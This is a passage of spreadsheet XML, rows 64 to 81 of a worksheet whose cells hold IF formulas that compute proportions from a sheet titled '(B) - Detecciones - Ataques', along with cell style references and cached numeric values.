        <f>IF('(B) - Detecciones - Ataques'!IP55&lt;&gt;0,'(B) - Detecciones - Ataques'!IP55*'(B) - Detecciones - Ataques'!IN55/('(B) - Detecciones - Ataques'!IL55+'(B) - Detecciones - Ataques'!IN55),0)</f>
        <v>0</v>
      </c>
      <c r="EN64" s="626"/>
      <c r="EO64" s="626"/>
      <c r="EP64" s="744"/>
      <c r="EQ64" s="745"/>
      <c r="ER64" s="745"/>
      <c r="ES64" s="745"/>
      <c r="ET64" s="745"/>
      <c r="EU64" s="745"/>
      <c r="EV64" s="745"/>
      <c r="EW64" s="745"/>
      <c r="EX64" s="745"/>
      <c r="EY64" s="745"/>
      <c r="EZ64" s="745"/>
      <c r="FA64" s="745"/>
      <c r="FB64" s="745"/>
      <c r="FC64" s="745"/>
      <c r="FD64" s="745"/>
      <c r="FE64" s="745"/>
      <c r="FF64" s="745"/>
      <c r="FG64" s="745"/>
      <c r="FH64" s="745"/>
      <c r="FI64" s="745"/>
      <c r="FJ64" s="745"/>
      <c r="FK64" s="745"/>
      <c r="FL64" s="745"/>
      <c r="FM64" s="745"/>
      <c r="FN64" s="745"/>
      <c r="FO64" s="745"/>
      <c r="FP64" s="745"/>
      <c r="FQ64" s="745"/>
      <c r="FR64" s="745"/>
      <c r="FS64" s="745"/>
      <c r="FT64" s="745"/>
      <c r="FU64" s="745"/>
    </row>
    <row r="65">
      <c r="EL65" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP56&lt;&gt;0,'(B) - Detecciones - Ataques'!IP56*'(B) - Detecciones - Ataques'!IL56/('(B) - Detecciones - Ataques'!IL56+'(B) - Detecciones - Ataques'!IN56),0)</f>
        <v>0</v>
      </c>
      <c r="EM65" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP56&lt;&gt;0,'(B) - Detecciones - Ataques'!IP56*'(B) - Detecciones - Ataques'!IN56/('(B) - Detecciones - Ataques'!IL56+'(B) - Detecciones - Ataques'!IN56),0)</f>
        <v>0</v>
      </c>
      <c r="EN65" s="626"/>
      <c r="EO65" s="626"/>
      <c r="EP65" s="744"/>
      <c r="EQ65" s="745"/>
      <c r="ER65" s="745"/>
      <c r="ES65" s="745"/>
      <c r="ET65" s="745"/>
      <c r="EU65" s="745"/>
      <c r="EV65" s="745"/>
      <c r="EW65" s="745"/>
      <c r="EX65" s="745"/>
      <c r="EY65" s="745"/>
      <c r="EZ65" s="745"/>
      <c r="FA65" s="745"/>
      <c r="FB65" s="745"/>
      <c r="FC65" s="745"/>
      <c r="FD65" s="745"/>
      <c r="FE65" s="745"/>
      <c r="FF65" s="745"/>
      <c r="FG65" s="745"/>
      <c r="FH65" s="745"/>
      <c r="FI65" s="745"/>
      <c r="FJ65" s="745"/>
      <c r="FK65" s="745"/>
      <c r="FL65" s="745"/>
      <c r="FM65" s="745"/>
      <c r="FN65" s="745"/>
      <c r="FO65" s="745"/>
      <c r="FP65" s="745"/>
      <c r="FQ65" s="745"/>
      <c r="FR65" s="745"/>
      <c r="FS65" s="745"/>
      <c r="FT65" s="745"/>
      <c r="FU65" s="745"/>
    </row>
    <row r="66">
      <c r="EL66" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP57&lt;&gt;0,'(B) - Detecciones - Ataques'!IP57*'(B) - Detecciones - Ataques'!IL57/('(B) - Detecciones - Ataques'!IL57+'(B) - Detecciones - Ataques'!IN57),0)</f>
        <v>0</v>
      </c>
      <c r="EM66" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP57&lt;&gt;0,'(B) - Detecciones - Ataques'!IP57*'(B) - Detecciones - Ataques'!IN57/('(B) - Detecciones - Ataques'!IL57+'(B) - Detecciones - Ataques'!IN57),0)</f>
        <v>0.3333333333</v>
      </c>
      <c r="EN66" s="626"/>
      <c r="EO66" s="626"/>
      <c r="EP66" s="744"/>
      <c r="EQ66" s="745"/>
      <c r="ER66" s="745"/>
      <c r="ES66" s="745"/>
      <c r="ET66" s="745"/>
      <c r="EU66" s="745"/>
      <c r="EV66" s="745"/>
      <c r="EW66" s="745"/>
      <c r="EX66" s="745"/>
      <c r="EY66" s="745"/>
      <c r="EZ66" s="745"/>
      <c r="FA66" s="745"/>
      <c r="FB66" s="745"/>
      <c r="FC66" s="745"/>
      <c r="FD66" s="745"/>
      <c r="FE66" s="745"/>
      <c r="FF66" s="745"/>
      <c r="FG66" s="745"/>
      <c r="FH66" s="745"/>
      <c r="FI66" s="745"/>
      <c r="FJ66" s="745"/>
      <c r="FK66" s="745"/>
      <c r="FL66" s="745"/>
      <c r="FM66" s="745"/>
      <c r="FN66" s="745"/>
      <c r="FO66" s="745"/>
      <c r="FP66" s="745"/>
      <c r="FQ66" s="745"/>
      <c r="FR66" s="745"/>
      <c r="FS66" s="745"/>
      <c r="FT66" s="745"/>
      <c r="FU66" s="745"/>
    </row>
    <row r="67">
      <c r="EL67" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP58&lt;&gt;0,'(B) - Detecciones - Ataques'!IP58*'(B) - Detecciones - Ataques'!IL58/('(B) - Detecciones - Ataques'!IL58+'(B) - Detecciones - Ataques'!IN58),0)</f>
        <v>0</v>
      </c>
      <c r="EM67" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP58&lt;&gt;0,'(B) - Detecciones - Ataques'!IP58*'(B) - Detecciones - Ataques'!IN58/('(B) - Detecciones - Ataques'!IL58+'(B) - Detecciones - Ataques'!IN58),0)</f>
        <v>0</v>
      </c>
      <c r="EN67" s="626"/>
      <c r="EO67" s="626"/>
      <c r="EP67" s="744"/>
      <c r="EQ67" s="745"/>
      <c r="ER67" s="745"/>
      <c r="ES67" s="745"/>
      <c r="ET67" s="745"/>
      <c r="EU67" s="745"/>
      <c r="EV67" s="745"/>
      <c r="EW67" s="745"/>
      <c r="EX67" s="745"/>
      <c r="EY67" s="745"/>
      <c r="EZ67" s="745"/>
      <c r="FA67" s="745"/>
      <c r="FB67" s="745"/>
      <c r="FC67" s="745"/>
      <c r="FD67" s="782"/>
      <c r="FE67" s="782"/>
      <c r="FF67" s="782"/>
      <c r="FG67" s="782"/>
      <c r="FH67" s="782"/>
      <c r="FI67" s="782"/>
      <c r="FJ67" s="782"/>
      <c r="FK67" s="782"/>
      <c r="FL67" s="782"/>
      <c r="FM67" s="782"/>
      <c r="FN67" s="782"/>
      <c r="FO67" s="782"/>
      <c r="FP67" s="782"/>
      <c r="FQ67" s="782"/>
      <c r="FR67" s="782"/>
      <c r="FS67" s="782"/>
      <c r="FT67" s="782"/>
      <c r="FU67" s="782"/>
    </row>
    <row r="68">
      <c r="EL68" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP59&lt;&gt;0,'(B) - Detecciones - Ataques'!IP59*'(B) - Detecciones - Ataques'!IL59/('(B) - Detecciones - Ataques'!IL59+'(B) - Detecciones - Ataques'!IN59),0)</f>
        <v>1</v>
      </c>
      <c r="EM68" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP59&lt;&gt;0,'(B) - Detecciones - Ataques'!IP59*'(B) - Detecciones - Ataques'!IN59/('(B) - Detecciones - Ataques'!IL59+'(B) - Detecciones - Ataques'!IN59),0)</f>
        <v>0</v>
      </c>
      <c r="EN68" s="626"/>
      <c r="EO68" s="626"/>
      <c r="EP68" s="744"/>
      <c r="EQ68" s="745"/>
      <c r="ER68" s="745"/>
      <c r="ES68" s="745"/>
      <c r="ET68" s="745"/>
      <c r="EU68" s="745"/>
      <c r="EV68" s="745"/>
      <c r="EW68" s="745"/>
      <c r="EX68" s="745"/>
      <c r="EY68" s="745"/>
      <c r="EZ68" s="745"/>
      <c r="FA68" s="745"/>
      <c r="FB68" s="745"/>
      <c r="FC68" s="745"/>
      <c r="FD68" s="782"/>
      <c r="FE68" s="743"/>
      <c r="FF68" s="743"/>
      <c r="FG68" s="743"/>
      <c r="FH68" s="743"/>
      <c r="FI68" s="743"/>
      <c r="FJ68" s="743"/>
      <c r="FK68" s="743"/>
      <c r="FL68" s="743"/>
      <c r="FM68" s="743"/>
      <c r="FN68" s="743"/>
      <c r="FO68" s="743"/>
      <c r="FP68" s="743"/>
      <c r="FQ68" s="743"/>
      <c r="FR68" s="743"/>
      <c r="FS68" s="743"/>
      <c r="FT68" s="743"/>
      <c r="FU68" s="743"/>
    </row>
    <row r="69">
      <c r="EL69" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP60&lt;&gt;0,'(B) - Detecciones - Ataques'!IP60*'(B) - Detecciones - Ataques'!IL60/('(B) - Detecciones - Ataques'!IL60+'(B) - Detecciones - Ataques'!IN60),0)</f>
        <v>0</v>
      </c>
      <c r="EM69" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP60&lt;&gt;0,'(B) - Detecciones - Ataques'!IP60*'(B) - Detecciones - Ataques'!IN60/('(B) - Detecciones - Ataques'!IL60+'(B) - Detecciones - Ataques'!IN60),0)</f>
        <v>0</v>
      </c>
      <c r="EN69" s="626"/>
      <c r="EO69" s="626"/>
      <c r="EP69" s="744"/>
      <c r="EQ69" s="745"/>
      <c r="ER69" s="745"/>
      <c r="ES69" s="745"/>
      <c r="ET69" s="745"/>
      <c r="EU69" s="745"/>
      <c r="EV69" s="745"/>
      <c r="EW69" s="745"/>
      <c r="EX69" s="745"/>
      <c r="EY69" s="745"/>
      <c r="EZ69" s="745"/>
      <c r="FA69" s="745"/>
      <c r="FB69" s="745"/>
      <c r="FC69" s="745"/>
      <c r="FD69" s="782"/>
      <c r="FE69" s="743"/>
      <c r="FF69" s="743"/>
      <c r="FG69" s="743"/>
      <c r="FH69" s="743"/>
      <c r="FI69" s="743"/>
      <c r="FJ69" s="743"/>
      <c r="FK69" s="743"/>
      <c r="FL69" s="743"/>
      <c r="FM69" s="743"/>
      <c r="FN69" s="743"/>
      <c r="FO69" s="743"/>
      <c r="FP69" s="743"/>
      <c r="FQ69" s="743"/>
      <c r="FR69" s="743"/>
      <c r="FS69" s="743"/>
      <c r="FT69" s="743"/>
      <c r="FU69" s="743"/>
    </row>
    <row r="70">
      <c r="EL70" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP61&lt;&gt;0,'(B) - Detecciones - Ataques'!IP61*'(B) - Detecciones - Ataques'!IL61/('(B) - Detecciones - Ataques'!IL61+'(B) - Detecciones - Ataques'!IN61),0)</f>
        <v>0</v>
      </c>
      <c r="EM70" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP61&lt;&gt;0,'(B) - Detecciones - Ataques'!IP61*'(B) - Detecciones - Ataques'!IN61/('(B) - Detecciones - Ataques'!IL61+'(B) - Detecciones - Ataques'!IN61),0)</f>
        <v>0</v>
      </c>
      <c r="EN70" s="626"/>
      <c r="EO70" s="626"/>
      <c r="EP70" s="744"/>
      <c r="EQ70" s="745"/>
      <c r="ER70" s="745"/>
      <c r="ES70" s="745"/>
      <c r="ET70" s="745"/>
      <c r="EU70" s="745"/>
      <c r="EV70" s="745"/>
      <c r="EW70" s="745"/>
      <c r="EX70" s="745"/>
      <c r="EY70" s="745"/>
      <c r="EZ70" s="745"/>
      <c r="FA70" s="745"/>
      <c r="FB70" s="745"/>
      <c r="FC70" s="745"/>
      <c r="FD70" s="745"/>
      <c r="FE70" s="745"/>
      <c r="FF70" s="782"/>
      <c r="FG70" s="782"/>
      <c r="FH70" s="782"/>
      <c r="FI70" s="782"/>
      <c r="FJ70" s="782"/>
      <c r="FK70" s="782"/>
      <c r="FL70" s="782"/>
      <c r="FM70" s="782"/>
      <c r="FN70" s="782"/>
      <c r="FO70" s="782"/>
      <c r="FP70" s="782"/>
      <c r="FQ70" s="782"/>
      <c r="FR70" s="782"/>
      <c r="FS70" s="782"/>
      <c r="FT70" s="782"/>
      <c r="FU70" s="782"/>
    </row>
    <row r="71">
      <c r="EL71" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP62&lt;&gt;0,'(B) - Detecciones - Ataques'!IP62*'(B) - Detecciones - Ataques'!IL62/('(B) - Detecciones - Ataques'!IL62+'(B) - Detecciones - Ataques'!IN62),0)</f>
        <v>1</v>
      </c>
      <c r="EM71" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP62&lt;&gt;0,'(B) - Detecciones - Ataques'!IP62*'(B) - Detecciones - Ataques'!IN62/('(B) - Detecciones - Ataques'!IL62+'(B) - Detecciones - Ataques'!IN62),0)</f>
        <v>0</v>
      </c>
      <c r="EN71" s="626"/>
      <c r="EO71" s="626"/>
      <c r="EP71" s="744"/>
      <c r="EQ71" s="745"/>
      <c r="ER71" s="745"/>
      <c r="ES71" s="745"/>
      <c r="ET71" s="745"/>
      <c r="EU71" s="745"/>
      <c r="EV71" s="745"/>
      <c r="EW71" s="745"/>
      <c r="EX71" s="745"/>
      <c r="EY71" s="745"/>
      <c r="EZ71" s="745"/>
      <c r="FA71" s="745"/>
      <c r="FB71" s="745"/>
      <c r="FC71" s="745"/>
      <c r="FD71" s="745"/>
      <c r="FE71" s="745"/>
      <c r="FF71" s="782"/>
      <c r="FG71" s="743"/>
      <c r="FH71" s="743"/>
      <c r="FI71" s="743"/>
      <c r="FJ71" s="743"/>
      <c r="FK71" s="743"/>
      <c r="FL71" s="743"/>
      <c r="FM71" s="743"/>
      <c r="FN71" s="743"/>
      <c r="FO71" s="743"/>
      <c r="FP71" s="743"/>
      <c r="FQ71" s="743"/>
      <c r="FR71" s="743"/>
      <c r="FS71" s="743"/>
      <c r="FT71" s="743"/>
      <c r="FU71" s="743"/>
    </row>
    <row r="72">
      <c r="EL72" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP63&lt;&gt;0,'(B) - Detecciones - Ataques'!IP63*'(B) - Detecciones - Ataques'!IL63/('(B) - Detecciones - Ataques'!IL63+'(B) - Detecciones - Ataques'!IN63),0)</f>
        <v>1</v>
      </c>
      <c r="EM72" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP63&lt;&gt;0,'(B) - Detecciones - Ataques'!IP63*'(B) - Detecciones - Ataques'!IN63/('(B) - Detecciones - Ataques'!IL63+'(B) - Detecciones - Ataques'!IN63),0)</f>
        <v>0</v>
      </c>
      <c r="EN72" s="626"/>
      <c r="EO72" s="626"/>
      <c r="EP72" s="744"/>
      <c r="EQ72" s="745"/>
      <c r="ER72" s="745"/>
      <c r="ES72" s="745"/>
      <c r="ET72" s="745"/>
      <c r="EU72" s="745"/>
      <c r="EV72" s="745"/>
      <c r="EW72" s="745"/>
      <c r="EX72" s="745"/>
      <c r="EY72" s="745"/>
      <c r="EZ72" s="745"/>
      <c r="FA72" s="745"/>
      <c r="FB72" s="745"/>
      <c r="FC72" s="745"/>
      <c r="FD72" s="745"/>
      <c r="FE72" s="745"/>
      <c r="FF72" s="782"/>
      <c r="FG72" s="743"/>
      <c r="FH72" s="743"/>
      <c r="FI72" s="743"/>
      <c r="FJ72" s="743"/>
      <c r="FK72" s="743"/>
      <c r="FL72" s="743"/>
      <c r="FM72" s="743"/>
      <c r="FN72" s="743"/>
      <c r="FO72" s="743"/>
      <c r="FP72" s="743"/>
      <c r="FQ72" s="743"/>
      <c r="FR72" s="743"/>
      <c r="FS72" s="743"/>
      <c r="FT72" s="743"/>
      <c r="FU72" s="743"/>
    </row>
    <row r="73">
      <c r="EL73" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP64&lt;&gt;0,'(B) - Detecciones - Ataques'!IP64*'(B) - Detecciones - Ataques'!IL64/('(B) - Detecciones - Ataques'!IL64+'(B) - Detecciones - Ataques'!IN64),0)</f>
        <v>1</v>
      </c>
      <c r="EM73" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP64&lt;&gt;0,'(B) - Detecciones - Ataques'!IP64*'(B) - Detecciones - Ataques'!IN64/('(B) - Detecciones - Ataques'!IL64+'(B) - Detecciones - Ataques'!IN64),0)</f>
        <v>0</v>
      </c>
      <c r="EN73" s="626"/>
      <c r="EO73" s="626"/>
      <c r="EP73" s="744"/>
      <c r="EQ73" s="745"/>
      <c r="ER73" s="745"/>
      <c r="ES73" s="745"/>
      <c r="ET73" s="745"/>
      <c r="EU73" s="745"/>
      <c r="EV73" s="745"/>
      <c r="EW73" s="745"/>
      <c r="EX73" s="745"/>
      <c r="EY73" s="745"/>
      <c r="EZ73" s="745"/>
      <c r="FA73" s="745"/>
      <c r="FB73" s="745"/>
      <c r="FC73" s="745"/>
      <c r="FD73" s="745"/>
      <c r="FE73" s="745"/>
      <c r="FF73" s="745"/>
      <c r="FG73" s="745"/>
      <c r="FH73" s="745"/>
      <c r="FI73" s="745"/>
      <c r="FJ73" s="745"/>
      <c r="FK73" s="745"/>
      <c r="FL73" s="745"/>
      <c r="FM73" s="745"/>
      <c r="FN73" s="745"/>
      <c r="FO73" s="745"/>
      <c r="FP73" s="745"/>
      <c r="FQ73" s="745"/>
      <c r="FR73" s="745"/>
      <c r="FS73" s="745"/>
      <c r="FT73" s="745"/>
      <c r="FU73" s="745"/>
    </row>
    <row r="74">
      <c r="EL74" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP65&lt;&gt;0,'(B) - Detecciones - Ataques'!IP65*'(B) - Detecciones - Ataques'!IL65/('(B) - Detecciones - Ataques'!IL65+'(B) - Detecciones - Ataques'!IN65),0)</f>
        <v>1</v>
      </c>
      <c r="EM74" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP65&lt;&gt;0,'(B) - Detecciones - Ataques'!IP65*'(B) - Detecciones - Ataques'!IN65/('(B) - Detecciones - Ataques'!IL65+'(B) - Detecciones - Ataques'!IN65),0)</f>
        <v>0</v>
      </c>
      <c r="EN74" s="626"/>
      <c r="EO74" s="626"/>
      <c r="EP74" s="744"/>
      <c r="EQ74" s="745"/>
      <c r="ER74" s="745"/>
      <c r="ES74" s="745"/>
      <c r="ET74" s="745"/>
      <c r="EU74" s="745"/>
      <c r="EV74" s="745"/>
      <c r="EW74" s="745"/>
      <c r="EX74" s="745"/>
      <c r="EY74" s="745"/>
      <c r="EZ74" s="745"/>
      <c r="FA74" s="745"/>
      <c r="FB74" s="745"/>
      <c r="FC74" s="745"/>
      <c r="FD74" s="745"/>
      <c r="FE74" s="745"/>
      <c r="FF74" s="745"/>
      <c r="FG74" s="745"/>
      <c r="FH74" s="745"/>
      <c r="FI74" s="745"/>
      <c r="FJ74" s="745"/>
      <c r="FK74" s="745"/>
      <c r="FL74" s="745"/>
      <c r="FM74" s="745"/>
      <c r="FN74" s="745"/>
      <c r="FO74" s="745"/>
      <c r="FP74" s="745"/>
      <c r="FQ74" s="745"/>
      <c r="FR74" s="745"/>
      <c r="FS74" s="745"/>
      <c r="FT74" s="745"/>
      <c r="FU74" s="745"/>
    </row>
    <row r="75">
      <c r="EL75" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP66&lt;&gt;0,'(B) - Detecciones - Ataques'!IP66*'(B) - Detecciones - Ataques'!IL66/('(B) - Detecciones - Ataques'!IL66+'(B) - Detecciones - Ataques'!IN66),0)</f>
        <v>0</v>
      </c>
      <c r="EM75" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP66&lt;&gt;0,'(B) - Detecciones - Ataques'!IP66*'(B) - Detecciones - Ataques'!IN66/('(B) - Detecciones - Ataques'!IL66+'(B) - Detecciones - Ataques'!IN66),0)</f>
        <v>0</v>
      </c>
      <c r="EN75" s="626"/>
      <c r="EO75" s="626"/>
      <c r="EP75" s="744"/>
      <c r="EQ75" s="745"/>
      <c r="ER75" s="745"/>
      <c r="ES75" s="745"/>
      <c r="ET75" s="745"/>
      <c r="EU75" s="745"/>
      <c r="EV75" s="745"/>
      <c r="EW75" s="745"/>
      <c r="EX75" s="745"/>
      <c r="EY75" s="745"/>
      <c r="EZ75" s="745"/>
      <c r="FA75" s="745"/>
      <c r="FB75" s="745"/>
      <c r="FC75" s="745"/>
      <c r="FD75" s="745"/>
      <c r="FE75" s="745"/>
      <c r="FF75" s="745"/>
      <c r="FG75" s="745"/>
      <c r="FH75" s="782"/>
      <c r="FI75" s="782"/>
      <c r="FJ75" s="782"/>
      <c r="FK75" s="782"/>
      <c r="FL75" s="782"/>
      <c r="FM75" s="782"/>
      <c r="FN75" s="782"/>
      <c r="FO75" s="782"/>
      <c r="FP75" s="782"/>
      <c r="FQ75" s="782"/>
      <c r="FR75" s="782"/>
      <c r="FS75" s="782"/>
      <c r="FT75" s="782"/>
      <c r="FU75" s="782"/>
    </row>
    <row r="76">
      <c r="EL76" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP67&lt;&gt;0,'(B) - Detecciones - Ataques'!IP67*'(B) - Detecciones - Ataques'!IL67/('(B) - Detecciones - Ataques'!IL67+'(B) - Detecciones - Ataques'!IN67),0)</f>
        <v>0</v>
      </c>
      <c r="EM76" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP67&lt;&gt;0,'(B) - Detecciones - Ataques'!IP67*'(B) - Detecciones - Ataques'!IN67/('(B) - Detecciones - Ataques'!IL67+'(B) - Detecciones - Ataques'!IN67),0)</f>
        <v>0</v>
      </c>
      <c r="EN76" s="626"/>
      <c r="EO76" s="626"/>
      <c r="EP76" s="744"/>
      <c r="EQ76" s="745"/>
      <c r="ER76" s="745"/>
      <c r="ES76" s="745"/>
      <c r="ET76" s="745"/>
      <c r="EU76" s="745"/>
      <c r="EV76" s="745"/>
      <c r="EW76" s="745"/>
      <c r="EX76" s="745"/>
      <c r="EY76" s="745"/>
      <c r="EZ76" s="745"/>
      <c r="FA76" s="745"/>
      <c r="FB76" s="745"/>
      <c r="FC76" s="745"/>
      <c r="FD76" s="745"/>
      <c r="FE76" s="745"/>
      <c r="FF76" s="745"/>
      <c r="FG76" s="745"/>
      <c r="FH76" s="782"/>
      <c r="FI76" s="743"/>
      <c r="FJ76" s="743"/>
      <c r="FK76" s="743"/>
      <c r="FL76" s="743"/>
      <c r="FM76" s="743"/>
      <c r="FN76" s="743"/>
      <c r="FO76" s="743"/>
      <c r="FP76" s="743"/>
      <c r="FQ76" s="743"/>
      <c r="FR76" s="743"/>
      <c r="FS76" s="743"/>
      <c r="FT76" s="743"/>
      <c r="FU76" s="743"/>
    </row>
    <row r="77">
      <c r="ED77" s="21"/>
      <c r="EE77" s="36"/>
      <c r="EL77" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP68&lt;&gt;0,'(B) - Detecciones - Ataques'!IP68*'(B) - Detecciones - Ataques'!IL68/('(B) - Detecciones - Ataques'!IL68+'(B) - Detecciones - Ataques'!IN68),0)</f>
        <v>0</v>
      </c>
      <c r="EM77" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP68&lt;&gt;0,'(B) - Detecciones - Ataques'!IP68*'(B) - Detecciones - Ataques'!IN68/('(B) - Detecciones - Ataques'!IL68+'(B) - Detecciones - Ataques'!IN68),0)</f>
        <v>1</v>
      </c>
      <c r="EN77" s="626"/>
      <c r="EO77" s="626"/>
      <c r="EP77" s="744"/>
      <c r="EQ77" s="745"/>
      <c r="ER77" s="745"/>
      <c r="ES77" s="745"/>
      <c r="ET77" s="745"/>
      <c r="EU77" s="745"/>
      <c r="EV77" s="745"/>
      <c r="EW77" s="745"/>
      <c r="EX77" s="745"/>
      <c r="EY77" s="745"/>
      <c r="EZ77" s="745"/>
      <c r="FA77" s="745"/>
      <c r="FB77" s="745"/>
      <c r="FC77" s="745"/>
      <c r="FD77" s="745"/>
      <c r="FE77" s="745"/>
      <c r="FF77" s="745"/>
      <c r="FG77" s="745"/>
      <c r="FH77" s="782"/>
      <c r="FI77" s="743"/>
      <c r="FJ77" s="743"/>
      <c r="FK77" s="743"/>
      <c r="FL77" s="743"/>
      <c r="FM77" s="743"/>
      <c r="FN77" s="743"/>
      <c r="FO77" s="743"/>
      <c r="FP77" s="743"/>
      <c r="FQ77" s="743"/>
      <c r="FR77" s="743"/>
      <c r="FS77" s="743"/>
      <c r="FT77" s="743"/>
      <c r="FU77" s="743"/>
    </row>
    <row r="78">
      <c r="ED78" s="21"/>
      <c r="EE78" s="36"/>
      <c r="EL78" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP69&lt;&gt;0,'(B) - Detecciones - Ataques'!IP69*'(B) - Detecciones - Ataques'!IL69/('(B) - Detecciones - Ataques'!IL69+'(B) - Detecciones - Ataques'!IN69),0)</f>
        <v>0</v>
      </c>
      <c r="EM78" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP69&lt;&gt;0,'(B) - Detecciones - Ataques'!IP69*'(B) - Detecciones - Ataques'!IN69/('(B) - Detecciones - Ataques'!IL69+'(B) - Detecciones - Ataques'!IN69),0)</f>
        <v>1</v>
      </c>
      <c r="EN78" s="626"/>
      <c r="EO78" s="626"/>
      <c r="EP78" s="744"/>
      <c r="EQ78" s="745"/>
      <c r="ER78" s="745"/>
      <c r="ES78" s="745"/>
      <c r="ET78" s="745"/>
      <c r="EU78" s="745"/>
      <c r="EV78" s="745"/>
      <c r="EW78" s="745"/>
      <c r="EX78" s="745"/>
      <c r="EY78" s="745"/>
      <c r="EZ78" s="745"/>
      <c r="FA78" s="745"/>
      <c r="FB78" s="745"/>
      <c r="FC78" s="745"/>
      <c r="FD78" s="745"/>
      <c r="FE78" s="745"/>
      <c r="FF78" s="745"/>
      <c r="FG78" s="745"/>
      <c r="FH78" s="745"/>
      <c r="FI78" s="745"/>
      <c r="FJ78" s="745"/>
      <c r="FK78" s="745"/>
      <c r="FL78" s="745"/>
      <c r="FM78" s="745"/>
      <c r="FN78" s="745"/>
      <c r="FO78" s="745"/>
      <c r="FP78" s="745"/>
      <c r="FQ78" s="745"/>
      <c r="FR78" s="745"/>
      <c r="FS78" s="745"/>
      <c r="FT78" s="745"/>
      <c r="FU78" s="745"/>
    </row>
    <row r="79">
      <c r="EL79" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP70&lt;&gt;0,'(B) - Detecciones - Ataques'!IP70*'(B) - Detecciones - Ataques'!IL70/('(B) - Detecciones - Ataques'!IL70+'(B) - Detecciones - Ataques'!IN70),0)</f>
        <v>1</v>
      </c>
      <c r="EM79" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP70&lt;&gt;0,'(B) - Detecciones - Ataques'!IP70*'(B) - Detecciones - Ataques'!IN70/('(B) - Detecciones - Ataques'!IL70+'(B) - Detecciones - Ataques'!IN70),0)</f>
        <v>0</v>
      </c>
      <c r="EN79" s="626"/>
      <c r="EO79" s="626"/>
      <c r="EP79" s="744"/>
      <c r="EQ79" s="745"/>
      <c r="ER79" s="745"/>
      <c r="ES79" s="745"/>
      <c r="ET79" s="745"/>
      <c r="EU79" s="745"/>
      <c r="EV79" s="745"/>
      <c r="EW79" s="745"/>
      <c r="EX79" s="745"/>
      <c r="EY79" s="745"/>
      <c r="EZ79" s="745"/>
      <c r="FA79" s="745"/>
      <c r="FB79" s="745"/>
      <c r="FC79" s="745"/>
      <c r="FD79" s="745"/>
      <c r="FE79" s="745"/>
      <c r="FF79" s="745"/>
      <c r="FG79" s="745"/>
      <c r="FH79" s="745"/>
      <c r="FI79" s="745"/>
      <c r="FJ79" s="745"/>
      <c r="FK79" s="745"/>
      <c r="FL79" s="745"/>
      <c r="FM79" s="745"/>
      <c r="FN79" s="745"/>
      <c r="FO79" s="745"/>
      <c r="FP79" s="745"/>
      <c r="FQ79" s="745"/>
      <c r="FR79" s="745"/>
      <c r="FS79" s="745"/>
      <c r="FT79" s="745"/>
      <c r="FU79" s="745"/>
    </row>
    <row r="80">
      <c r="EL80" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP71&lt;&gt;0,'(B) - Detecciones - Ataques'!IP71*'(B) - Detecciones - Ataques'!IL71/('(B) - Detecciones - Ataques'!IL71+'(B) - Detecciones - Ataques'!IN71),0)</f>
        <v>0</v>
      </c>
      <c r="EM80" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP71&lt;&gt;0,'(B) - Detecciones - Ataques'!IP71*'(B) - Detecciones - Ataques'!IN71/('(B) - Detecciones - Ataques'!IL71+'(B) - Detecciones - Ataques'!IN71),0)</f>
        <v>0</v>
      </c>
      <c r="EN80" s="626"/>
      <c r="EO80" s="626"/>
      <c r="EP80" s="744"/>
      <c r="EQ80" s="745"/>
      <c r="ER80" s="745"/>
      <c r="ES80" s="745"/>
      <c r="ET80" s="745"/>
      <c r="EU80" s="745"/>
      <c r="EV80" s="745"/>
      <c r="EW80" s="745"/>
      <c r="EX80" s="745"/>
      <c r="EY80" s="745"/>
      <c r="EZ80" s="745"/>
      <c r="FA80" s="745"/>
      <c r="FB80" s="745"/>
      <c r="FC80" s="745"/>
      <c r="FD80" s="745"/>
      <c r="FE80" s="745"/>
      <c r="FF80" s="745"/>
      <c r="FG80" s="745"/>
      <c r="FH80" s="745"/>
      <c r="FI80" s="745"/>
      <c r="FJ80" s="745"/>
      <c r="FK80" s="745"/>
      <c r="FL80" s="745"/>
      <c r="FM80" s="745"/>
      <c r="FN80" s="745"/>
      <c r="FO80" s="745"/>
      <c r="FP80" s="745"/>
      <c r="FQ80" s="745"/>
      <c r="FR80" s="745"/>
      <c r="FS80" s="745"/>
      <c r="FT80" s="745"/>
      <c r="FU80" s="745"/>
    </row>
    <row r="81">
      <c r="EL81" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP72&lt;&gt;0,'(B) - Detecciones - Ataques'!IP72*'(B) - Detecciones - Ataques'!IL72/('(B) - Detecciones - Ataques'!IL72+'(B) - Detecciones - Ataques'!IN72),0)</f>
        <v>1</v>
      </c>
      <c r="EM81" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP72&lt;&gt;0,'(B) - Detecciones - Ataques'!IP72*'(B) - Detecciones - Ataques'!IN72/('(B) - Detecciones - Ataques'!IL72+'(B) - Detecciones - Ataques'!IN72),0)</f>
        <v>0</v>
      </c>
      <c r="EN81" s="626"/>
